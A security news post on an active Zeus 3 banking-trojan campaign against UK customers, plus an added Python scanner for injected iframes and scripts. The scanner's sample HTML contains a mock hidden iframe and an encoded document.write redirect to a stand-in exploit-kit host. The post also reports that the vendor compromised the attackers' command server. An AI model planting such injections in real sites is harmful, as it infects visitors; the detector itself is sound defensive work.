M86 discovers an active Zeus 3 attack – happening right now
M86 Security has discovered and exposed a sophisticated attack targeting the UK customers of an international financial institution. M86 believes that at least 3000 UK customers have been compromised, and that around £675,000 has been stolen (so far) from those customer accounts. A detailed analysis of the attack methodology can be found in M86’s whitepaper: Cybercriminals Target Online Banking Customers, and I thoroughly recommend that anyone who uses online banking should read this paper.
The trojan used in this attack is Zeus version 3 – the latest, most advanced and sophisticated iteration of the successful and dangerous Zeus family of banking malware. Customers of the financial institution concerned were infected by visiting legitimate websites that had themselves been compromised by the criminals. Code injected into these sites redirected visitors to the malicious Eleonore Exploit Kit 1.4.1, which ultimately infected the users with Zeus 3. Relevant law enforcement agencies and the bank itself have been informed.
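The infection chain above starts with a legitimate site carrying injected code that silently redirects visitors to an exploit kit. As an added illustration (not code from M86 or from the article), the following Python script shows the kind of check a site owner can run over their own pages to spot such injections: iframes or scripts that point to hosts outside the site and its known trusted hosts, iframes sized or styled to be invisible, and inline scripts that unpack themselves with `unescape`/`document.write`. The sample HTML, the hostnames `shop.example`, `cdn.example.com` and `exploit-kit.example`, and the heuristics themselves are assumptions for the example; the article does not describe the exact form of the injection.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page (not from the article): a normal page with two
# injected elements, a hidden third-party iframe and a self-unpacking script.
SAMPLE_HTML = """
<html><head><title>Shop</title>
<script src="/static/app.js"></script>
</head><body>
<h1>Welcome</h1>
<iframe src="http://exploit-kit.example/load.php" width="1" height="1"
        style="visibility:hidden"></iframe>
<script>document.write(unescape("%3Ciframe%20src%3D%22http%3A%2F%2Fexploit-kit.example%2F%22%3E%3C%2Fiframe%3E"));</script>
<script src="https://cdn.example.com/jquery.js"></script>
</body></html>
"""

PERCENT_ESCAPE = re.compile(r"%[0-9a-fA-F]{2}")


def _looks_hidden(attrs):
    """True for iframes that are 0/1 pixel or hidden via inline style."""
    style = (attrs.get("style") or "").replace(" ", "").lower()
    tiny = attrs.get("width") in ("0", "1") or attrs.get("height") in ("0", "1")
    return tiny or "display:none" in style or "visibility:hidden" in style


def _looks_obfuscated(script_text):
    """Heuristic: self-decoding inline script or a dense run of %XX escapes."""
    if "unescape(" in script_text and "document.write" in script_text:
        return True
    return len(PERCENT_ESCAPE.findall(script_text)) >= 20


class InjectedRefFinder(HTMLParser):
    """Collect iframe/script elements that look injected rather than the site's own."""

    def __init__(self, site_host, trusted_hosts):
        super().__init__()
        self.site_host = site_host.lower()
        self.trusted = {h.lower() for h in trusted_hosts}
        self.findings = []
        self._in_inline_script = False

    def handle_starttag(self, tag, attrs):
        if tag not in ("iframe", "script"):
            return
        a = dict(attrs)
        src = a.get("src")
        # Inline <script> bodies are inspected in handle_data.
        self._in_inline_script = (tag == "script" and src is None)
        if src is None:
            return
        host = urlparse(src).netloc.lower()
        reasons = []
        # Relative URLs have an empty netloc and are treated as the site's own.
        if host and host != self.site_host and host not in self.trusted:
            reasons.append("third-party host")
        if tag == "iframe" and _looks_hidden(a):
            reasons.append("hidden iframe")
        if reasons:
            self.findings.append({"tag": tag, "src": src, "reasons": reasons})

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_inline_script = False

    def handle_data(self, data):
        if self._in_inline_script and _looks_obfuscated(data):
            self.findings.append(
                {"tag": "script", "src": None, "reasons": ["obfuscated inline script"]}
            )


def find_suspicious_refs(html, site_host, trusted_hosts=()):
    """Return a list of findings for iframes/scripts that look injected."""
    parser = InjectedRefFinder(site_host, trusted_hosts)
    parser.feed(html)
    return parser.findings


if __name__ == "__main__":
    for f in find_suspicious_refs(SAMPLE_HTML, "shop.example", ["cdn.example.com"]):
        print(f["tag"], f["src"], ", ".join(f["reasons"]))
```

Run against a saved copy of each page (or the output of `curl`), feeding the site's own hostname and any CDN hosts it legitimately uses; anything reported is worth a manual look, and a hidden iframe to an unknown host is close to a sure sign of the injection the article describes. The heuristics are deliberately simple and will miss injections that are obfuscated differently, so treat a clean result as absence of evidence, not proof.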
“Once the infection is achieved,” said Bradley Anstis, vice president of technology strategy, “the attack itself is targeted against a single financial institution, a global banking institution with offices in the UK.” At this point, given the ongoing nature of both the attack and the investigation, M86 was unable to tell me which bank is involved (other than that it involves the UK customers of this bank), nor where the criminals are located (other than that their command and control servers are in Eastern Europe). When I first spoke to M86 a few days ago, approximately £525,000 had been siphoned off. As of this morning, this has risen to £675,000; and the attack is still progressing.
One of the worrying features of this attack is that the institution concerned offers its customers free anti-fraud security software. It isn’t yet clear whether the attackers managed to avoid detection by this software, or the customers simply didn’t install it. Nevertheless, M86 submitted samples of the malware to VirusTotal. “One of them,” said Anstis, “had a 2% detection rate by the anti-virus products, while the other had a 14% detection rate. The infected user accounts themselves are a mixture of personal accounts and commercial accounts – so it goes to show that just being a commercial customer with a security team protecting you from the evils of the internet doesn’t always guarantee that you’re going to be safe.” And if they’re not safe, what hope for the rest of us personal customers?
At this stage M86 doesn’t know the full extent of the attack. They located and examined one command and control server. There may be more. In fact there is as yet no way of knowing how long or how successful this attack has been. One reason is that the criminals have been patient – one would almost say, ‘not greedy’. They used, for example, a ‘Robin Hood’ algorithm to determine how much to steal from any particular account before transferring it to a money mule. “The system only stole money from accounts that held more than a specified amount of money, and usually in individual thefts averaging between £1000 and £3000.”
I asked M86 how it found this attack. “We have a free tool that anyone can download and use, called SecureBrowsing,” explained Anstis. “It tells you whether a link you get from search engine results, or Twitter etc., is malicious. This gives us a list of URLs that we know people are visiting, so we know the active places on the Internet where we should concentrate our attention – and from this and other feeds from our commercial products we noticed an infected legitimate site. We visited the site and got one of our test machines infected with the trojan concerned – in this case Zeus 3 – and we then started communicating with the command and control server handling that trojan. It was located in Eastern Europe. We compromised that command and control server and examined the log files – and that’s how we got all the information.”
So, what can we do to protect ourselves? Well, one obvious route to take is to explore M86’s own security products – after all, they discovered this attack before anyone else. But that doesn’t mean that you can abandon traditional solutions. You still need anti-virus software, and you need to make sure it is as up to date as possible. You should then try to protect yourself during standard browsing. I have always recommended, and continue to recommend, using Firefox with the NoScript add-on. This will stop an infected website infecting you. And, of course, you should seriously examine M86’s own SecureBrowsing.